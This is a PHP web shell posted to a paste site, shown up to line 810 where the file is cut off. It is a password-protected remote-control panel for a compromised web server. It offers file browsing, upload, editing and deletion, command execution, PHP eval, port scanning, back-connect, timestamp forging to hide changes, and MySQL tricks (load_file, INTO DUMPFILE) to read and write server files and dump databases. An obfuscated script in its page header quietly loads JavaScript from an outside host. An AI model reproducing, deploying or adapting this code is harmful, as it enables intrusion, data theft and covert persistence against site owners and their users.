· 6 years ago · Jul 15, 2019, 11:12 AM
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0 );
10define('IS_GPC', get_magic_quotes_gpc());
11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
13@set_time_limit(0);
14
15foreach($_POST as $key => $value) {
16 if (IS_GPC) {
17 $value = s_array($value);
18 }
19 $$key = $value;
20}
21/*===================== ???? =====================*/
22
23//echo encode_pass('angel');exit;
24//angel = ec38fe2a8497e0a8d6d349b3533038cb
25// ????????,???????,????????
26$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
27
28//??? cookie ?????????, ??????, ???????, ???????
29// cookie ??
30$cookiepre = '';
31// cookie ???
32$cookiedomain = '';
33// cookie ????
34$cookiepath = '/';
35// cookie ???
36$cookielife = 86400;
37
38//???????????
39!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
40/*===================== ???? =====================*/
41
42$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
43if ($charset == 'utf8') {
44 header("content-Type: text/html; charset=utf-8");
45} elseif ($charset == 'big5') {
46 header("content-Type: text/html; charset=big5");
47} elseif ($charset == 'gbk') {
48 header("content-Type: text/html; charset=gbk");
49} elseif ($charset == 'latin1') {
50 header("content-Type: text/html; charset=iso-8859-2");
51} elseif ($charset == 'euc-kr') {
52 header("content-Type: text/html; charset=euc-kr");
53} elseif ($charset == 'euc-jp') {
54 header("content-Type: text/html; charset=euc-jp");
55}
56
57$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
58$timestamp = time();
59
60/*===================== ???? =====================*/
61if ($action == "logout") {
62 scookie('loginpass', '', -86400 * 365);
63 @header('Location: '.$self);
64 exit;
65}
66if($pass) {
67 if ($action == 'login') {
68 if ($pass == encode_pass($password)) {
69 scookie('loginpass',encode_pass($password));
70 @header('Location: '.$self);
71 exit;
72 }
73 }
74 if ($_COOKIE['loginpass']) {
75 if ($_COOKIE['loginpass'] != $pass) {
76 loginpage();
77 }
78 } else {
79 loginpage();
80 }
81}
82/*===================== ???? =====================*/
83
84$errmsg = '';
85!$action && $action = 'file';
86
87// ??PHPINFO
88if ($action == 'phpinfo') {
89 if (IS_PHPINFO) {
90 phpinfo();
91 exit;
92 } else {
93 $errmsg = 'phpinfo() function has non-permissible';
94 }
95}
96
97// ????
98if ($doing == 'downfile' && $thefile) {
99 if (!@file_exists($thefile)) {
100 $errmsg = 'The file you want Downloadable was nonexistent';
101 } else {
102 $fileinfo = pathinfo($thefile);
103 header('Content-type: application/x-'.$fileinfo['extension']);
104 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
105 header('Content-Length: '.filesize($thefile));
106 @readfile($thefile);
107 exit;
108 }
109}
110
111// ?????????
112if ($doing == 'backupmysql' && !$saveasfile) {
113 if (!$table) {
114 $errmsg ='Please choose the table';
115 } else {
116 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
117 $filename = basename($dbname.'.sql');
118 header('Content-type: application/unknown');
119 header('Content-Disposition: attachment; filename='.$filename);
120 foreach($table as $k => $v) {
121 if ($v) {
122 sqldumptable($v);
123 }
124 }
125 mysql_close();
126 exit;
127 }
128}
129
130// ??MYSQL????
131if($doing=='mysqldown'){
132 if (!$dbname) {
133 $errmsg = 'Please input dbname';
134 } else {
135 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
136 if (!file_exists($mysqldlfile)) {
137 $errmsg = 'The file you want Downloadable was nonexistent';
138 } else {
139 $result = q("select load_file('$mysqldlfile');");
140 if(!$result){
141 q("DROP TABLE IF EXISTS tmp_angel;");
142 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
143 //?????????,???????????__angel_1111111111_eof__??????????
144 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
145 $result = q("select content from tmp_angel");
146 q("DROP TABLE tmp_angel");
147 }
148 $row = @mysql_fetch_array($result);
149 if (!$row) {
150 $errmsg = 'Load file failed '.mysql_error();
151 } else {
152 $fileinfo = pathinfo($mysqldlfile);
153 header('Content-type: application/x-'.$fileinfo['extension']);
154 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
155 header("Accept-Length: ".strlen($row[0]));
156 echo $row[0];
157 exit;
158 }
159 }
160 }
161}
162
163?>
164<html>
165<head>
166<meta http-equiv="Content-Type" content="text/html; charset=gbk">
167<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
168<script type="text/javascript" language="javascript">
169<!--
170ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
171MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
172OT="";
173for(j=0;j<MI.length;j++){
174OT+=ML.charAt(MI.charCodeAt(j)-48);
175}document.write(OT);
176// --></script>
177<style type="text/css">
178body,td{font: 12px Arial,Tahoma;line-height: 16px;}
179.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
180.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
181.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
182a {color: #00f;text-decoration:underline;}
183a:hover{color: #f00;text-decoration:none;}
184.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
185.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
186.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
187.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
188.head td span{font-weight:normal;}
189.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
190form{margin:0;padding:0;}
191h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
192ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
193u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
194.drives{padding:5px;}
195.drives span {margin:auto 7px;}
196</style>
197<script type="text/javascript">
198function CheckAll(form) {
199 for(var i=0;i<form.elements.length;i++) {
200 var e = form.elements[i];
201 if (e.name != 'chkall')
202 e.checked = form.chkall.checked;
203 }
204}
205function $(id) {
206 return document.getElementById(id);
207}
208function createdir(){
209 var newdirname;
210 newdirname = prompt('Please input the directory name:', '');
211 if (!newdirname) return;
212 $('createdir').newdirname.value=newdirname;
213 $('createdir').submit();
214}
215function fileperm(pfile){
216 var newperm;
217 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
218 if (!newperm) return;
219 $('fileperm').newperm.value=newperm;
220 $('fileperm').pfile.value=pfile;
221 $('fileperm').submit();
222}
223function copyfile(sname){
224 var tofile;
225 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
226 if (!tofile) return;
227 $('copyfile').tofile.value=tofile;
228 $('copyfile').sname.value=sname;
229 $('copyfile').submit();
230}
231function rename(oldname){
232 var newfilename;
233 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
234 if (!newfilename) return;
235 $('rename').newfilename.value=newfilename;
236 $('rename').oldname.value=oldname;
237 $('rename').submit();
238}
239function dofile(doing,thefile,m){
240 if (m && !confirm(m)) {
241 return;
242 }
243 $('filelist').doing.value=doing;
244 if (thefile){
245 $('filelist').thefile.value=thefile;
246 }
247 $('filelist').submit();
248}
249function createfile(nowpath){
250 var filename;
251 filename = prompt('Please input the file name:', '');
252 if (!filename) return;
253 opfile('editfile',nowpath + filename,nowpath);
254}
255function opfile(action,opfile,dir){
256 $('fileopform').action.value=action;
257 $('fileopform').opfile.value=opfile;
258 $('fileopform').dir.value=dir;
259 $('fileopform').submit();
260}
261function godir(dir,view_writable){
262 if (view_writable) {
263 $('godir').view_writable.value=view_writable;
264 }
265 $('godir').dir.value=dir;
266 $('godir').submit();
267}
268function getsize(getdir,dir){
269 $('getsize').getdir.value=getdir;
270 $('getsize').dir.value=dir;
271 $('getsize').submit();
272}
273function editrecord(action, base64, tablename){
274 if (action == 'del') {
275 if (!confirm('Is or isn\'t deletion record?')) return;
276 }
277 $('recordlist').doing.value=action;
278 $('recordlist').base64.value=base64;
279 $('recordlist').tablename.value=tablename;
280 $('recordlist').submit();
281}
282function moddbname(dbname) {
283 if(!dbname) return;
284 $('setdbname').dbname.value=dbname;
285 $('setdbname').submit();
286}
287function settable(tablename,doing,page) {
288 if(!tablename) return;
289 if (doing) {
290 $('settable').doing.value=doing;
291 }
292 if (page) {
293 $('settable').page.value=page;
294 }
295 $('settable').tablename.value=tablename;
296 $('settable').submit();
297}
298function s(action,nowpath,p1,p2,p3,p4,p5) {
299 if(action) $('opform').action.value=action;
300 if(nowpath) $('opform').nowpath.value=nowpath;
301 if(p1) $('opform').p1.value=p1;
302 if(p2) $('opform').p2.value=p2;
303 if(p3) $('opform').p3.value=p3;
304 if(p4) $('opform').p4.value=p4;
305 if(p5) $('opform').p4.value=p5;
306}
307function g(action,nowpath,p1,p2,p3,p4,p5) {
308 if(!action) return;
309 s(action,nowpath,p1,p2,p3,p4,p5);
310 $('opform').submit();
311}
312</script>
313</head>
314<body style="margin:0;table-layout:fixed; word-break:break-all">
315<?php
316formhead(array('name'=>'opform'));
317makehide('action', $action);
318makehide('nowpath', $nowpath);
319makehide('p1', $p1);
320makehide('p2', $p2);
321makehide('p3', $p3);
322makehide('p4', $p4);
323makehide('p5', $p5);
324formfoot();
325
326if(!function_exists('posix_getegid')) {
327 $user = @get_current_user();
328 $uid = @getmyuid();
329 $gid = @getmygid();
330 $group = "?";
331} else {
332 $uid = @posix_getpwuid(@posix_geteuid());
333 $gid = @posix_getgrgid(@posix_getegid());
334 $user = $uid['name'];
335 $uid = $uid['uid'];
336 $group = $gid['name'];
337 $gid = $gid['gid'];
338}
339
340?>
341<table width="100%" border="0" cellpadding="0" cellspacing="0">
342 <tr class="head">
343 <td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
344 </tr>
345 <tr class="alt1">
346 <td>
347 <span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
348 <a href="javascript:g('logout');">Logout</a> |
349 <a href="javascript:g('file');">File Manager</a> |
350 <a href="javascript:g('mysqladmin');">MYSQL Manager</a> |
351 <a href="javascript:g('sqlfile');">MySQL Upload & Download</a> |
352 <a href="javascript:g('shell');">Execute Command</a> |
353 <a href="javascript:g('phpenv');">PHP Variable</a> |
354 <a href="javascript:g('portscan');">Port Scan</a> |
355 <a href="javascript:g('secinfo');">Security information</a> |
356 <a href="javascript:g('eval');">Eval PHP Code</a>
357 <?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
358 </td>
359 </tr>
360</table>
361<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
362<?php
363$errmsg && m($errmsg);
364
365// ??????
366if (!$dir) {
367 $dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
368}
369$nowpath = getPath(SA_ROOT, $dir);
370if (substr($dir, -1) != '/') {
371 $dir = $dir.'/';
372}
373
374if ($action == 'file') {
375
376 // ??????
377 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
378
379 // ????
380 if ($newdirname) {
381 $mkdirs = $nowpath.$newdirname;
382 if (file_exists($mkdirs)) {
383 m('Directory has already existed');
384 } else {
385 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
386 @chmod($mkdirs,0777);
387 }
388 }
389
390 // ????
391 elseif ($doupfile) {
392 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
393 }
394
395 // ????
396 elseif ($editfilename && $filecontent) {
397 $fp = @fopen($editfilename,'w');
398 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
399 @fclose($fp);
400 }
401
402 // ??????
403 elseif ($pfile && $newperm) {
404 if (!file_exists($pfile)) {
405 m('The original file does not exist');
406 } else {
407 $newperm = base_convert($newperm,8,10);
408 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
409 }
410 }
411
412 // ??
413 elseif ($oldname && $newfilename) {
414 $nname = $nowpath.$newfilename;
415 if (file_exists($nname) || !file_exists($oldname)) {
416 m($nname.' has already existed or original file does not exist');
417 } else {
418 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
419 }
420 }
421
422 // ????
423 elseif ($sname && $tofile) {
424 if (file_exists($tofile) || !file_exists($sname)) {
425 m('The goal file has already existed or original file does not exist');
426 } else {
427 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
428 }
429 }
430
431 // ????
432 elseif ($curfile && $tarfile) {
433 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
434 m('The goal file has already existed or original file does not exist');
435 } else {
436 $time = @filemtime($tarfile);
437 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
438 }
439 }
440
441 // ?????
442 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
443 if (!@file_exists($curfile)) {
444 m(basename($curfile).' does not exist');
445 } else {
446 $time = strtotime("$year-$month-$day $hour:$minute:$second");
447 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
448 }
449 }
450
451 // ??????
452 elseif($doing == 'delfiles') {
453 if ($dl) {
454 $dfiles='';
455 $succ = $fail = 0;
456 foreach ($dl as $filepath) {
457 if (is_dir($filepath)) {
458 if (@deltree($filepath)) {
459 $succ++;
460 } else {
461 $fail++;
462 }
463 } else {
464 if (@unlink($filepath)) {
465 $succ++;
466 } else {
467 $fail++;
468 }
469 }
470 }
471 m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
472 } else {
473 m('Please select folder/file(s)');
474 }
475 }
476
477 //????
478 formhead(array('name'=>'createdir'));
479 makehide('newdirname');
480 makehide('dir',$nowpath);
481 formfoot();
482 formhead(array('name'=>'fileperm'));
483 makehide('newperm');
484 makehide('pfile');
485 makehide('dir',$nowpath);
486 formfoot();
487 formhead(array('name'=>'copyfile'));
488 makehide('sname');
489 makehide('tofile');
490 makehide('dir',$nowpath);
491 formfoot();
492 formhead(array('name'=>'rename'));
493 makehide('oldname');
494 makehide('newfilename');
495 makehide('dir',$nowpath);
496 formfoot();
497 formhead(array('name'=>'fileopform', 'target'=>'_blank'));
498 makehide('action');
499 makehide('opfile');
500 makehide('dir');
501 formfoot();
502 formhead(array('name'=>'getsize'));
503 makehide('getdir');
504 makehide('dir');
505 formfoot();
506
507 $free = @disk_free_space($nowpath);
508 !$free && $free = 0;
509 $all = @disk_total_space($nowpath);
510 !$all && $all = 0;
511 $used = $all-$free;
512 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
513
514 $cwd_links = '';
515 $path = explode('/', $nowpath);
516 $n=count($path);
517 for($i=0;$i<$n-1;$i++) {
518 $cwd_links .= '<a href="javascript:godir(\'';
519 for($j=0;$j<=$i;$j++) {
520 $cwd_links .= $path[$j].'/';
521 }
522 $cwd_links .= '\');">'.$path[$i].'/</a>';
523 }
524
525?>
526<script type="text/javascript">
527document.onclick = shownav;
528function shownav(e){
529 var src = e?e.target:event.srcElement;
530 do{
531 if(src.id =="jumpto") {
532 $('inputnav').style.display = "";
533 $('pathnav').style.display = "none";
534 //hidenav();
535 return;
536 }
537 if(src.id =="inputnav") {
538 return;
539 }
540 src = src.parentNode;
541 }while(src.parentNode)
542
543 $('inputnav').style.display = "none";
544 $('pathnav').style.display = "";
545}
546</script>
547<div style="background:#eee;margin-bottom:10px;">
548 <table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
549 <tr>
550 <td width="100%"><?php echo $cwd_links.' - '.getChmod($nowpath).' / '.getPerms($nowpath).getUser($nowpath);?> (<?php echo $dir_writeable;?>)</td>
551 <td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
552 </tr>
553 </table>
554 <table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
555 <form action="" method="post" id="godir" name="godir">
556 <tr>
557 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
558 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:99%;margin:0 8px;"></td>
559 <td nowrap><input class="bt" value="GO" type="submit"></td>
560 </tr>
561 </form>
562 </table>
563<?php
564 if (IS_WIN && IS_COM) {
565 $obj = new COM('scripting.filesystemobject');
566 if ($obj && is_object($obj) && $obj->Drives) {
567 echo '<div class="drives">';
568 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
569 $comma = '';
570 foreach($obj->Drives as $drive) {
571 if ($drive->Path) {
572 p($comma.'<a href="javascript:godir(\''.$drive->Path.'/\');">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
573 $comma = '<span>|</span>';
574 }
575 }
576 echo '</div>';
577 }
578 }
579?>
580</div>
581<?php
582 $findstr = $_POST['findstr'];
583 $re = $_POST['re'];
584 tbhead();
585 p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
586 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$nowpath.'" type="hidden" /><input name="dir" value="'.$nowpath.'" type="hidden" /></div></form>');
587 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
588 p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
589 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
590 p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
591 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
592 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
593
594 p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
595
596 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
597
598 //???????????
599 $dirdata=array();
600 $filedata=array();
601
602 if ($view_writable == 'dir') {
603 $dirdata = GetWDirList($nowpath);
604 $filedata = array();
605 } elseif ($view_writable == 'file') {
606 $dirdata = array();
607 $filedata = GetWFileList($nowpath);
608 } elseif ($findstr) {
609 $dirdata = array();
610 $filedata = GetSFileList($nowpath, $findstr, $re);
611 } else {
612 // ????
613 //scandir()????
614 $dirs=@opendir($dir);
615 while ($file=@readdir($dirs)) {
616 $filepath=$nowpath.$file;
617 if(@is_dir($filepath)){
618 $dirdb['filename']=$file;
619 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
620 $dirdb['dirchmod']=getChmod($filepath);
621 $dirdb['dirperm']=getPerms($filepath);
622 $dirdb['fileowner']=getUser($filepath);
623 $dirdb['dirlink']=$nowpath;
624 $dirdb['server_link']=$filepath;
625 $dirdata[]=$dirdb;
626 } else {
627 $filedb['filename']=$file;
628 $filedb['size']=sizecount(@filesize($filepath));
629 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
630 $filedb['filechmod']=getChmod($filepath);
631 $filedb['fileperm']=getPerms($filepath);
632 $filedb['fileowner']=getUser($filepath);
633 $filedb['dirlink']=$nowpath;
634 $filedb['server_link']=$filepath;
635 $filedata[]=$filedb;
636 }
637 }// while
638 unset($dirdb);
639 unset($filedb);
640 @closedir($dirs);
641 }
642 @sort($dirdata);
643 @sort($filedata);
644 $dir_i = '0';
645
646 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
647 makehide('action','file');
648 makehide('thefile');
649 makehide('doing');
650 makehide('dir',$nowpath);
651
652 foreach($dirdata as $key => $dirdb){
653 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
654 if($getdir && $getdir == $dirdb['server_link']) {
655 $attachsize = dirsize($dirdb['server_link']);
656 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
657 } else {
658 $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
659 }
660 $thisbg = bg();
661 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
662 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
663 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
664 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
665 p('<td nowrap>'.$attachsize.'</td>');
666 p('<td nowrap>');
667 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
668 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
669 p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
670 p('</tr>');
671 $dir_i++;
672 } else {
673 if($dirdb['filename']=='..') {
674 p('<tr class='.bg().'>');
675 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
676 p('</tr>');
677 }
678 }
679 }
680
681 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
682 $file_i = '0';
683
684 foreach($filedata as $key => $filedb){
685 if($filedb['filename']!='..' && $filedb['filename']!='.') {
686 $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
687 $thisbg = bg();
688 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
689 p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
690 p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
691 p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
692 p('<td nowrap>'.$filedb['size'].'</td>');
693 p('<td nowrap>');
694 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
695 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
696 p('<td nowrap>');
697 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
698 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
699 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
700 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
701 p('</td></tr>');
702 $file_i++;
703 }
704 }
705 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
706 p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
707 p('</form></table>');
708}// end dir
709
710elseif ($action == 'sqlfile') {
711 if($doing=="mysqlupload"){
712 $file = $_FILES['uploadfile'];
713 $filename = $file['tmp_name'];
714 if (file_exists($savepath)) {
715 m('The goal file has already existed');
716 } else {
717 if(!$filename) {
718 m('Please choose a file');
719 } else {
720 $fp=@fopen($filename,'r');
721 $contents=@fread($fp, filesize($filename));
722 @fclose($fp);
723 $contents = bin2hex($contents);
724 if(!$upname) $upname = $file['name'];
725 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
726 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
727 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
728 }
729 }
730 }
731?>
732<script type="text/javascript">
733function mysqlfile(doing){
734 if(!doing) return;
735 $('doing').value=doing;
736 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
737 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
738 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
739 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
740 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
741 $('mysqlfile').charset.value=$('dbinfo').charset.value;
742 $('mysqlfile').submit();
743}
744</script>
745<?php
746 !$dbhost && $dbhost = 'localhost';
747 !$dbuser && $dbuser = 'root';
748 !$dbport && $dbport = '3306';
749 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
750 makehide('action','sqlfile');
751 p('<p>');
752 p('DBHost:');
753 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
754 p(':');
755 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
756 p('DBUser:');
757 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
758 p('DBPass:');
759 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
760 p('DBName:');
761 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
762 p('DBCharset:');
763 makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
764 p('</p>');
765 formfoot();
766 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
767 p('<h2>Upload file</h2>');
768 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
769 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
770 p('<h2>Download file</h2>');
771 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
772 makehide('dbhost');
773 makehide('dbport');
774 makehide('dbuser');
775 makehide('dbpass');
776 makehide('dbname');
777 makehide('charset');
778 makehide('doing');
779 makehide('action','sqlfile');
780 p('</form>');
781}
782
783elseif ($action == 'mysqladmin') {
784 !$dbhost && $dbhost = 'localhost';
785 !$dbuser && $dbuser = 'root';
786 !$dbport && $dbport = '3306';
787 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
788 if(isset($dbhost)){
789 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
790 }
791 if(isset($dbuser)) {
792 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
793 }
794 if(isset($dbpass)) {
795 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
796 }
797 if(isset($dbport)) {
798 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
799 }
800 if(isset($dbname)) {
801 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
802 }
803 if(isset($charset)) {
804 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
805 }
806
807 if ($doing == 'backupmysql' && $saveasfile) {
808 if (!$table) {
809 m('Please choose the table');
810 } else {
